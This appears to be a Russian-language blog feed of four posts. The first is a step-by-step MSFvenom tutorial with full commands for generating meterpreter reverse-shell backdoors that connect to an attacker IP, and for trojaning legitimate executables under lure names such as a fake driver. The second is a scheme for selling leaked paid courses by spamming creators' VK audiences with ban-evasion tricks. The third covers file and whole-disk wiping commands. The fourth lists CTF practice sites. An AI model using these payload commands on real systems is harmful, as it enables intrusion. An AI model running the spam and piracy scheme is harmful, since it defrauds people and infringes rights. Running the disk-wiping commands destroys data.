Для атакующего полезная нагрузка является ключевым элементом, который необходимо доставить на компьютер цели и выполнить. Код полезной нагрузки может быть написан самостоятельно (и это правильный подход, позволяющий значительно снизить шансы обнаружения антивирусами – в этом вы быстро убедитесь сами, если будете пробовать запускать исполнимые файлы с полезной нагрузкой в системах с установленным антивирусом), а можно воспользоваться разнообразными генераторами полезной нагрузки. Суть работы этих программ заключается в том, что вы выбираете типичную задачу (например, инициализация оболочки для ввода команд с обратным подключением), а генератор выдаёт вам исполнимый код под выбранную платформу. Если у вас нет навыков в программировании, то это единственный возможный вариант.

Одним из самых популярных генераторов полезной нагрузки является MSFvenom. Это самостоятельная часть Metasploit, предназначенная для генерации полезной нагрузки.

Что такое бэкдоры и трояны

Бэкдор – это программа или технология, дающая несанкционированный доступ к компьютеру или другому устройству (роутер, телефон).

В нашем случае, генерируемая с помощью MSFvenom полезная нагрузка является бэкдором.

Троян – это программа, которая замаскирована под легитимную программу, но несёт в себе полезную нагрузку. Очень часто этой полезной нагрузкой является бэкдор.

Т.е. если мы к файлу программы «Калькулятор», добавили полезную нагрузку – это будет троянская программа с бэкдором. Если мы сгенерировали полезную нагрузку, разместили на компьютере цели и, например, добавили файл в автозагрузку – то это будет бэкдор.

Иногда термины троян и бэкдор используют как взаимозаменяемые. Антивирусные компании при наименовании вирусов обычно используют Trojan, даже если программа не маскируется под другую легитимную программу, а является чистым бэкдором, поскольку для доставления полезной нагрузки часто используется социальная инженерия – что вполне вписывается в концепцию Троянского Коня.

Для целей этой статьи классификация на трояны и бэкдоры неважна. MSFvenom генерирует бэкдоры, но с ключом -x (позволяющим указывать пользовательский исполнимый файл для использования в качестве шаблона) можно генерировать трояны, у которых в качестве полезной нагрузки будет бэкдор.

Инструкция по использованию MSFvenom – генератора полезной нагрузки

Msfvenom – это программа, которая комбинирует генерацию полезной нагрузки и кодирование. Она заменила две другие программы – msfpayload и msfencode, это произошло 8 июня 2015.

Знакомство с программой начнём со справки по её опциям.

Использование:

/usr/bin/msfvenom [опции] <переменная=значение>

Опции:

-p, --payload <полезная нагрузка> Используемая полезная нагрузка. Укажите ‘-‘ или stdin для использования пользовательской полезной нагрузки
--payload-options Показывает список опций для полезной нагрузки
-l, --list [тип] Выводит список типов модулей. Опциями являются: payloads, encoders, nops, all
-n, --nopsled <длина> Подготовить nopsled [длинной] к полезной нагрузке
-f, --format <формат> Формат вывода (используйте --help-formats для вывода форматов)
--help-formats Показать список доступных форматов
-e, --encoder <инкодер> Кодировщик для использования
-a, --arch Архитектура для использования
--platform <платформа> Платформа полезной нагрузки
--help-platforms Вывести списки платформ
-s, --space <длина> Максимальная длина конечной полезной нагрузки
--encoder-space <длина> Максимальная длина кодированной полезной нагрузки (по умолчанию используется значение из -s)
-b, --bad-chars <список> Список символов, которые нужно избегать, пример: ‘/x00/xff‘
-i, --iterations <счётчик> Количество раз кодирования полезной нагрузки
-c, --add-code <путь> Укажите дополнительный файл шеллкода win32 для внедрения
-x, --template <путь> Указать пользовательский исполнимый файл для использования в качестве шаблона
-k, --keep Сохранить template behavior и вставить полезную нагрузку как новый поток
-o, --out <путь> Сохранить полезную нагрузку
-v, --var-name <имя> Укажите имя пользовательской переменной, которое будет использоваться для определенных форматов вывода
--smallest Сгенерировать самую маленькую из возможных полезных нагрузок
-h, --help Показать справку

В справке упоминается nopsled, вы можете найти дополнительную информацию о NOP slide в Википедии (хотя для наших целей это неважно).

Как создать полезную нагрузку

Для генерации полезной нагрузки обязательными являются два флага: -p and -f.

Пример команды:

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o /tmp/my_payload.exe

Здесь:

-p windows/meterpreter/reverse_tcp – выбранный тип полезной нагрузки
lhost=IP_атакующего – адрес атакующего, для обратного соединения с компьютера жертвы
lport=4444 – порт, к которому будет делаться обратное соединение
-f exe – формат полезной нагрузки (исполнимый файл Windows)
-o /tmp/my_payload.exe – сохранить сгенерированный код в указанный файл

Виды полезной нагрузки MSFvenom

Как уже было сказано, флаг -p является обязательным. После него нужно указать то, чего мы хотим от полезной нагрузки.

Чтобы вывести список всех полезных нагрузок, которые поддерживает платформа Metasploit, выполните команду:

msfvenom -l payloads

Будет выведен такой список:

Список длинный, включает в себя 486 пунктов (на момент написания) под самые разные платформы. Каждая запись состоит из двух столбцов: название полезной нагрузки (которое нужно указывать после опции -p) и её краткое описание.

Название начинается с указания платформы, затем может идти используемая техника или архитектура, в самом конце будет указана основная цель полезной нагрузки. Например, запись windows/meterpreter/reverse_tcp означает внедрение DLL сервера meterpreter через Reflective Dll Injection payload, с образованием обратного соединения до атакующего. Говоря простыми словами, будет создан реверсивный (обратный) шелл до атакующего, который позволит ему управлять целевым компьютером через meterpreter.

Слово meterpreter означает управление через Meterpreter (полное название Meta-Interpreter). Это многогранная программа, она является частью Metasploit с 2004. Работает она через dll внедрение. Скрипты и плагины загружаются и выгружаются динамически. Основы работы с Meterpreter будут раскрыты ниже.

Во многих названиях используются слова bind и reverse. Слово bind означает, что на атакуемой машине процесс будет прослушивать определённый порт, ожидая, пока атакующий подключится к нему. А reverse означает, что на атакуемой машине процесс программы сам инициализирует соединение до атакующего. Поскольку ногие файерволы настроены на разрешение исходящих соединений, то обратное (reverse) соединение даёт шанс обойти файервол.

Ключевое слово vncinject означает задействование технологии Virtual Network Computing (VNC) – удалённого доступа к рабочему столу.

Если в имени полезной нагрузки присутствует upexec, значит её цель загрузить и выполнить исполнимый файл.

shell означает открытие командной оболочки.

Ключевое слово dllinject относится к технике Reflective DLL injection. При её использовании полезная нагрузка внедряется в запущенный процесс, прямо в оперативной памяти. При этом она никогда не касается жёстких дисков. Полезные нагрузки VNC и Meterpreter используют reflective DLL injection.

В самом конце обычно стоит указание на используемый для соединения протокол, им может быть: http, https, tcp, ipv6_tcp, tcp_dns, winhttp, winhttps и другие варианты. Могут использоваться слова proxy (соответственно, соединение через прокси), allports (пробовать соединиться на всех возможных портах), uuid (соединение с поддержкой UUID).

Имеется несколько специфичных полезных нагрузок:

windows/adduser. Создаёт пользователя и добавляет его в группу локальных администраторов.
windows/dns_txt_query_exec. Выполняет TXT запросы к ряду DNS записей и выполняет полученную полезную нагрузку.
windows/download_exec. Загружает EXE с HTTP(S)/FTP URL и выполняет его.
windows/exec. Выполняет произвольную команду.
windows/format_all_drives. Форматирует все смонтированные в Windows диски (также известная как ShellcodeOfDeath). Если код по каким-либо причинам не может получить доступ к диску, то он пропускает диск и переходит к обработке следующего тома.
windows/loadlibrary. Загружает библиотеку по произвольному пути.
windows/messagebox. Показывает диалоговое сообщение через MessageBox, используя настраиваемый заголовок, текст и иконку.

По принципу работы, полезную нагрузку можно разделить на два типа:

«выстрелил и забыл» (может быть доставлена, например, на USB носителе, не требует сетевого соединения)
требующую дополнительных действий пользователя после запуска

К «выстрелил и забыл» можно отнести форматирование всех дисков, выполнение определённых команд, создание нового пользователя.

Большую группу составляют полезные нагрузки, открывающие доступ к оболочке, серверу meterpreter – после их запуска пользователь должен к ним подключиться для выполнения команд.

Как узнать опции полезной нагрузки MSFvenom

У многих полезных нагрузок имеются опции. Для их показа применяется флаг --payload-options. Также нужно использовать флаг -p, после которого нужно указать название интересующей полезной нагрузки.

Примеры

msfvenom -p windows/messagebox --payload-options

msfvenom -p windows/meterpreter/reverse_tcp --payload-options

Будет выведено:

Ниже будет ещё больше текста. Чтобы не захламлять статью я не стал его показывать полностью.

Столбец Required показывает, является ли опция обязательной. Для некоторых опций предусмотрено значение по умолчанию. Если для обязательной опции отсутствует значение по умолчанию, то его нужно указать при генерации полезной нагрузки. Например, для windows/meterpreter/reverse_tcp нужно обязательно указать LHOST.

Вспомним наш пример:

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o /tmp/my_payload.exe

В нём lport=4444 можно было не указывать, поскольку всё равно применяется значение по умолчанию. А опция LHOST установлена как «lhost=IP_атакующего».

Форматы полезной нагрузки

Как уже было сказано, вторым обязательным флагом является -f. Он устанвливает формат полезной нагрузки.

Чтобы вывести список всех поддерживаемых форматов, выполните команду:

msfvenom --help-formats

Будет выведено:

Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Примеры генерации полезной нагрузки в MSFvenom

Один из популярных вариантов создания полезной нагрузки под Windows уже показан выше:

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o backdoor.exe

Чтобы узнать ваш IP адрес, вы можете, например, воспользоваться командой

ip a

Чтобы узнать внешний IP:

curl suip.biz/ip/

Поскольку я моделирую атаку в локальной сети, то я буду использовать локальный IP компьютера с Kali Linux (192.168.0.196):

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=4444 -f exe -o backdoor.exe

Программа выведет:

И будет создан файл backdoor.exe.

Можно комбинировать несколько полезных нагрузок. Это позволяет сделать опция -c, которая указывает на файл с шеллколом win32, который должен быть включён в создаваемую полезную нагрузку.

Пример:

msfvenom -p windows/messagebox ICON="INFORMATION" TITLE="Compatibility test" TEXT="The test is processed" -f raw -o mes1

Мы использовали полезную нагрузку windows/messagebox (создаёт диалоговое окно), эта полезная нагрузка без кодирования (-f raw) была сохранена в файл mes1.

Далее мы вновь используем windows/messagebox, и без кодирования сохраняем в файл mes2. После ключа -c мы указываем файл (mes1), который должен быть включён в создаваемую полезную нагрузку.

msfvenom -c mes1 -p windows/messagebox ICON="ERROR" TITLE="Error" TEXT="Missing necessary files" -f raw -o mes2

Наконец, уже знакомая нам команда по созданию исполнимого файла, обратите внимание на опцию -c mes2, ей мы добавляем в создаваемый бинарник ранее сгенерированный файл mes2, который уже содержит mes1:

msfvenom -c mes2 -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=4444 -f exe -o driver_dlya_tvoego_computera.exe

Будет создан файл driver_dlya_tvoego_computera.exe, который при запуске покажет два окна и после этого попытается подключиться к удалённому компьютеру.

Опция -x позволяет указать существующий исполнимый файл (шаблон). Это можно делать для уменьшения подозрения пользователя (исполнимый файл может выполнять полезную для пользователя функцию), либо таким образом можно попытаться заменить уже существующий в системе файл.

Опция -k вместе с предыдущей сохранит нормальное поведение шаблона, и внедрённая полезная нагрузка будет выполняться как отдельный поток:

msfvenom -a x86 --platform windows -x sol.exe -k -p windows/messagebox lhost=192.168.101.133 -b "/x00" -f exe -o sol_bdoor.exe

Зарабатываем 10к в день на перепродажах

2020-06-08T17:04:02.435Z

Предисловие

Итак, сегодня расскажу вам про то, как я поднимал по 10к в день на пассиве. Для такого результата нужно хорошо поработать, но оно того стоит. Если у меня вышло, то у вас точно получится. Зарабатывать мы будем на перепродаже инфотоваров (не спеши возмущаться, тема хорошо доработана с выходом на пассив).

Модернизация и монетизация

Возможно, кто-то из вас помнит тему, где продавали слитые курсы. Если кто не знает, вкратце: находим инфобизнесменов (вк, инста) и начинаем рассылать их подписчикам сообщения по ЛС с предложением купить слитые курсы подешевле. Т.к. курсы стоили по 50-100к, на предложение взять за 1000₽ охотно соглашались. Однако приходилось переписываться с каждым отдельно и постоянно менять аккаунты. Сейчас же правила в вк и инсте стали еще жестче, и в большинстве случаев аккаунт блокировали насовсем, а клиенты терялись, не дойдя до покупки.

Соответственно встала задача перенаправить наших потенциальных клиентов во избежание бана, а также автоматизировать продажи, ибо переписываться с каждым отдельно – можно сойти с ума.

Самым простым решением оказалось создание автоматизированного телеграм-бота для продаж и перенаправление клиентов сразу туда. Я не стал заморачиваться и использовал чужого бота, однако самый профитный вариант - сделать своего (понадобятся вложения и терпение).

Создание своего бота

В первую очередь нам потребуется сам бот – можете поискать сливы на форумах или заказать на фрилансе. На фрилансе такой бот обойдется в 5-10 тысяч, но там все объяснят и повесят сразу на хост. Если же решили искать по сливам – нам потребуется хостинг (желательно не РФ, т.к. у многих инфоцыган (типа БМ или skillbox) имеются хорошие юристы, которые в случае чего начнут жаловаться на хостинг). Как приобрести и использовать хостинг, объяснять не буду – интернет в помощь.

Также понадобится домен (как его купить, тоже объяснять не буду, можете взять здесь (не реклама) – reg.ru, nic.ru).

Далее идем в BotFather, вводим название и ссылку, получаем API, меняем в коде бота API на наш (если искали по сливам, там должно быть указано).

Прикручиваем домен к хостингу (может занять до 48ч), заливаем на хост нашего бота, заполняем товарами, прикручиваем реквизиты оплаты (тут подробней описать не могу, зависит от того, что за бот у вас. Если нашли сливы – там должно быть указано, если делаете сами – можете использовать просто oplata.info или qiwi (потребуется, соответственно, API Qiwi), готово.

Я специально об этом не говорил подробно, ибо сам использовал просто другого бота, а те, кто хочет сделать своего – сами могут разобраться, вся инфа в открытом доступе, напрягите пальцы и погуглите, мы тут разбираем только ценную инфу.

Способы добычи трафика

1. Самый оптимальный – рассылка сообщений по комментариям ВК. Дает наибольший охват. Для начала можно вручную. Берем нашу реферальную ссылку, сокращаем, выбираем курс, ищем автора в вк и начинаем в тупую слать по комментариям к новым постам (к примеру, у Аяза на постах в среднем 100к просмотров, если успеть к выходу поста прокомментировать – Вы можете поймать этот трафик. Для избежания бана в ссылке можно сделать пробел и указывать, мол «удаляйте пробел», либо сделать изображение, где указать ссылку и рассылать изображение. Для рандомизации текста можно менять раскладку и изменять одинаковые символы английскими (к примеру, русскую «р» на английскую «p» и т.д.).

Вот инфоцыгане, по которым я работал:

https://vk.com/mariyasolodar

https://vk.com/geekbrainsru

https://vk.com/netology

https://vk.com/enjoymaloy

https://vk.com/molodost_bz

https://vk.com/ayazshabutdinov

https://vk.com/yy_rnd

https://vk.com/andrei_parabellum

https://vk.com/geniusmarketing

https://vk.com/skillbox_education

Вам советую найти своих, просто шарьте по сливам и найдете своего цыгана, с которого заработаете максимум. Тут главное пробовать. Если немного вложиться – можно закупить аккаунтов вк.

Также понадобится ipv4 прокси для вк и ipv6, если работаете по инстаграм (об этом позже). Я арендую ipv4 shared прокси на proxyline.net на 5 дней – выходит 18р за шт (используйте промокод на первую покупку, он висит на главной странице сайта).

Далее понадобится софт. Я использую первонах-скрипты (оставляют первый комментарий под постом, погуглите, полно слитых) и софт для рассылки сообщений (юзаю poster pro, т.к. лицензуха на месяц стоит 20р, не реклама. Может багать – качайте в таком случае предыдущую версию).

Собираем аудиторию инфоцыган, загружаем аккаунты, прокси (на один аккаунт желательно один прокси) и начинаем рассылку (по комментариям и по лс). Иногда можете рассылать просто эту схему, заменяя ссылку на свою. Способы придумайте сами.

Однако самый быстрый и действенный способ (соответственно, самый дорогой) – таргетированная реклама вк и инстаграм

Вот мои нескромные результаты только по одному сообществу вк:

Как видите CTR целых 3.6%! И это еще не лучший результат. В тот же день у меня купили курсов на 6к.

Как настраивать таргет - можете посмотреть в интернете, дам несколько советов: выбирайте сообщество инфоцыгана и давайте рекламу по его активным пользователям. Акцент стоит ставить на разнице цены, мол мы продаем те же курсы за 1% от реальной стоимости, а можно получить вообще бесплатно. Создайте несколько разных объявлений и протестируйте, какое лучше работает. Цену советую ставить за переход. Экспериментируйте! Таргет в инстаграм работает через фейсбук, там нельзя показывать объявление по конкурентам, поэтому пользуйтесь парсерами и давайте объявление по своей аудитории.

2. Инстаграм

Этим способом пользуюсь реже, поэтому многого не скажу. Скажу только, что можете использовать масслукинг (массовый просмотр историй, смотрит по 800к-1.5м в сутки). Многие заходят на аккаунт и видят запись\историю, что курсы инфобизнесменов есть в телеграмме (естественно, предварительно нужно добавить историю\пост и смотреть только истории подписчиков инфоцыган). Есть масса сервисов масслукинга с бесплатным пробным периодом, погуглите. Также попробуйте массфоловинг, масслайкинг и рассылку в директ (бан выдают чаще).

Можете придумать что-то своё, есть где разгуляться. Включите фантазию и пробуйте, главное – заполучить заинтересованного реферала\клиента.

Напоследок для мотивации скрин выплат:

Безопасно удаляем файлы

2020-06-06T11:22:34.745Z

Всем салют, дорогие друзья!
Сегодня мы поговорим об очень важном аспекте безопасности и анонимности:
безвозвратное удаление файлов и очистка диска.

Для начала напомним, что статья написана в образовательных целях. Мы не несем ответственности за любой возможный вред, причиненный материалами данной статьи.

Когда вы удаляете файл, даже минуя или очищая корзину, обычно он не удаляется в физическом смысле: «вычёркивается» только информация о нём, занимаемое им место считается свободным и в любое время туда может быть записан новый файл. Но пока это не произойдёт (запись новых данных), старый файл может быть успешно восстановлен.

Примерно это же происходит при «быстром форматировании», т.е. удаляется информация о существующих файлах, но сами данные не стираются и не перезаписываются.

Кроме программ для восстановления файлов имеется техника под названием магнитно-силовая микроскопия — Magnetic Force Microscopy (MFM), которая позволяет любому в меру финансируемому оппоненту восстановить последние два

магнитно-силовая микроскопия — Magnetic Force Microscopy (MFM)

Shred

Программа предустановлена в Kali Linux. Является частью пакета coreutils.

Shred случайными числами заполняет место, занятое файлом. И уже, даже восстановив ваш удалённый файл, его будет невозможно прочитать. По умолчанию shred не удаляет файл, для этого используется параметр --remove (-u).

shred -u /path/to/file

В shred заложен 25-тикратный цикл, то есть программа перезапишет файл случайным содержимым 25 раз.

Чтобы изменить это значение, например на 35-тикратный:

shred -u -n 35 /path/to/file

Если ваша паранойя достигла ещё большего уровня, то вам подойдут следующие советы:

Чтобы спрятать информацию о том, что вы зачищали файл, используйте параметр -z, добавляющий нули в конец файла — это сделает файл непохожим на зашифрованный. Если вам интересно наблюдать за процессом перезаписи, параметр -v (verbose) служит для подробного вывода информации прогресса.

shred -u -z /path/to/file

Если хотите удалить сразу несколько файлов, то укажите их в таком формате:

shred -u -z -n 30 /path/to/file1 /path/to/file2 /path/to/file3

или же можно использовать маску:

shred -u -z -n *.txt

Shred также может удалить содержимое всего жёсткого диска командой

shred /dev/sda

Естественно, время выполнения операций напрямую зависит от размера файла и скорости записи.

Единственным минусом является то, что shred не умеет удалять каталоги. В этом нам на помощь приходит утилита wipe.

Wipe

Wipe - многофункциональная консольная утилита для безвозвратного удаления отдельных файлов и каталогов, а также зачистки разделов, дисков и внешних носителей(флешек).

Домашняя страница - http://lambda-diode.com/software/wipe/

Установка в Kali Linux, Debian, Ubuntu, Linux Mint:

sudo apt-get install wipe

Установка в BlackArch:

sudo pacman -S wipe

Для быстрого стирания вы можете использовать её примерно так:

wipe -r -q /путь/для/затирания

Внимание: Wipe надёжно работает только для магнитной памяти, следовательно, для твердотельных дисков (памяти) используйте другие методы.

secure-delete (srm, sfill, sswap)

Пакет secure-delete включает в себя три утилиты(srm, sfill, sswap), которые безопасно очищают файлы, диски, раздел подкачки и память.

srm выполняет безопасную перезапись/переименование/удаление целевого файла(ов).
sfill выполняет безопасную перезапись свободного пространства на разделе, в котором находится указанная директория и всех свободных индексных дескрипторов (inode) указанного каталога.
sswap делает безопасную перезапись раздела подкачки.

Запуск srm со стандартными (безопасными) настройками с более подробным выводом для стирания диска /dev/sdX:

srm -v /dev/sdX

Лучшие ресурсы для практики взлома

2020-06-05T10:22:33.272Z

Сегодня разберем аж 22 ресурса, которые помогут практиковаться в искусстве взлома и ставить защиту на свои сервера. Площадки, обозреваемые в статье, доступны только на английском языке.

1) CTF365- ctf365.com

Пользователи CTF365 устанавливают и защищают свои собственные серверы одновременно с атаками на серверы других пользователей. CTF365 подойдёт профессионалам в области безопасности, которые хотят приобрести наступательные навыки, или системным администраторам, заинтересованным в улучшении своих защитных навыков. Если вы новичок в инфосеке, вы можете зарегистрировать бесплатную учетную запись для начинающих и познакомиться с ним с помощью нескольких предварительно настроенных уязвимых серверов.

2) OVERTHEWIRE- overthewire.org/wargames

OverTheWire подойдёт всем желающим изучить теорию информационной безопасности и применить её на практике независимо от своего опыта. Новичкам следует начать с задач уровня Bandit, поскольку они необходимы для дальнейшего решения других задач.

3) HACKING-LAB- [URL="http://www.hacking-lab.com/index.html[/URL]"]www.hacking-lab.com/index.html[/URL]

Hacking-Lab предоставляют задачи CTF для European Cyber Security Challenge, но они также проводят на своей платформе регулярные соревнования, в которых может участвовать каждый. Просто зарегистрируйтесь, настройте vpn и выберите себе задачу по вкусу.

4) PWNABLE.KR- pwnable.kr

Данная площадка фокусируется на pwn-задачах, подобных CTF, суть которых заключается в поиске, чтении и отправке файлов-флагов, которые есть в каждой задаче. Для доступа к содержимому файлов вы должны использовать навыки программирования, реверс-инжиниринга или эксплуатации уязвимостей, прежде чем сможете отправить решение.

Задачи делятся на 4 уровня сложности: лёгкий — для новичков, средний, сложный и хардкор, где задачи требуют нестандартных подходов для решения.

5) IO- io.netgarage.org

IO — это варгейм от создателей netgarage.org, сообщества, в котором единомышленники делятся знаниями о безопасности, искусственном интеллекте, VR и многом другом. Было создано 3 версии варгейма: IO, IO64 и IOarm, из них всех IO является наиболее зрелой. Подключайтесь к IO через SSH и можете приниматься за работу.

6) SMASHTHESTACK- smashthestack.org

SmashTheStack состоит из 7 различных варгеймов: Amateria, Apfel (в настоящее время офлайн), Blackbox, Blowfish, CTF (в настоящее время офлайн), Logic и Tux. Каждый варгейм содержит множество задач, начиная от стандартных уязвимостей и заканчивая задачами на реверс-инжиниринг.

7) MICROCORRUPTION- microcorruption.com/login

Microcorruption представляет собой CTF, в котором вам нужно «зареверсить» вымышленные электронные блокирующие устройства Lockitall. Устройства Lockitall защищают облигации, размещённые на складах, принадлежащих вымышленной компании Cy Yombinator. На пути к краже облигаций вы познакомитесь с ассемблером, узнаете, как использовать отладчик, пошагово выполнять код, устанавливать точки останова и исследовать память.

8) REVERSING.KR- reversing.kr/index.php

Здесь вы можете найти 26 задач для проверки ваших навыков взлома и реверс-инжиниринга. Сайт не обновлялся с конца 2012 года, но имеющиеся задачи по-прежнему являются ценными учебными ресурсами.

9) HACK THIS SITE- www.hackthissite.org

Hack This Site — бесплатный сайт c варгеймами для проверки и улучшения ваших навыков хакинга. Нам нём можно найти множество хакерских задач в нескольких категориях, включая базовые задачи, реалистичные задачи, приложения, программирование, фрикинг, JavaScript, форензику, стеганографию и т.д. Также сайт может похвастаться активным сообществом с большим каталогом хакерских статей и форумом для обсуждения вопросов, связанных с безопасностью. Недавно было объявлено, что кодовая база сайта будет пересмотрена, поэтому в ближайшие месяцы можно ожидать большие улучшения.

10) W3CHALLS- w3challs.com

W3Challs — это обучающая платформа с множеством задач в различных категориях, включая хакинг, варгеймы, форензику, криптографию, стеганографию и программирование. Цель платформы — предоставить реалистичные задачи. В зависимости от сложности решённой задачи вы получаете баллы. Также есть форум, на котором можно обсуждать и решать задачи с другими участниками.

11) PWN0- pwn0.com

Площадка pwn0 — это VPN, в которой происходит почти всё, что угодно. Сражайтесь против ботов или пользователей и набирайте очки, получая контроль над другими системами.

12) EXPLOIT EXERCISES- exploit-exercises.com

Exploit Exercises предлагает множество виртуальных машин, документацию и задачи, которые пригодятся в изучении повышения привилегий, анализа уязвимостей, разработки эксплойтов, отладки, реверс-инжиниринга и т.д.

13) RINGZER0 TEAM ONLINE CTF- ringzer0team.com

RingZer0 Team Online CTF предлагает более 200 задач, которые позволят вам проверить навыки взлома по нескольким направлениям — от криптографии, анализа вредоносных программ до SQL-инъекции, шеллкодинга и многого другого. После того, как вы нашли решение задачи, вы можете отправить его RingZer0 Team. Если ваше решение будет принято, вы получите RingZer0Gold, которое можно обменять на подсказки во время решения задач.

14) HELLBOUND HACKERS- www.hellboundhackers.org

На Hellbound Hackers можно найти традиционные задачи с эксплойтами и такие форматы задач, которых нет на других ресурсах. Например, патчинг приложений и задачи, ограниченные по времени. В задачах с патчингом вам даётся уязвимый фрагмент кода и вам нужно предложить исправление этой уязвимости.

15) TRY2HACK- www.try2hack.nl

Try2Hack — один из старейших сайтов по улучшению навыков хакинга, который всё ещё остаётся на плаву. Он предлагает несколько задач, чтобы развлечься. Задачи разнообразны и по мере продвижения становятся всё сложнее.

16) HACK.ME- hack.me

Hack.me представляет собой большую коллекцию уязвимых веб-приложений для применения навыков взлома на практике. Все приложения предоставляются сообществом и каждое из них можно запустить «на лету» в безопасной, изолированной песочнице.

17) HACKTHIS!!- www.hackthis.co.uk

HackThis!! состоит из 50+ задач разного уровня, за решение каждой из которых вы получаете определённое количество очков в зависимости от уровня сложности. Подобно Hack This Site, у HackThis!! также есть живое сообщество, многочисленные статьи и новости о хакинге, а также форум, на котором вы можете обсудить задачи и вопросы, связанные с безопасностью.

18) ENIGMA GROUP- www.enigmagroup.org

Enigma Group содержит более 300 задач с акцентом на топ-10 эксплойтов OWASP. Сайт имеет почти 48000 активных участников и проводит еженедельные CTF-соревнования, а также еженедельные и ежемесячные конкурсы.

19) GOOGLE GRUYERE- google-gruyere.appspot.com

Google Gruyere показывает, как можно эксплуатировать уязвимости веб-приложений и как от этого защититься. Вы сможете провести реальное тестирование на проникновение и фактически взломать настоящее приложение, используя атаки вроде XSS и XSRF.

20) GAME OF HACKS- www.gameofhacks.com

Game of Hacks показывает вам набор фрагментов кода в виде викторины с несколькими вариантами выбора, а вы должны определить правильную уязвимость в коде. Этот сайт немного выделяется из этого списка, но тем не менее это хорошая игра для выявления уязвимостей в коде.

21) ROOT ME- www.root-me.org

Root Me предлагает более 200 задач и более 50 виртуальных сред, позволяющих вам применить на практике свои навыки взлома в различных сценариях. Это определённо один из лучших сайтов в данном списке.

22) CTFTIME- ctftime.org

Хотя CTFtime не является хакерским сайтом, как другие в этом списке, это отличный ресурс, чтобы оставаться в курсе CTF-соревнований, происходящих по всему миру. Поэтому, если вы заинтересованы в присоединении к CTF-команде или участии в соревновании, вам стоит сюда заглянуть.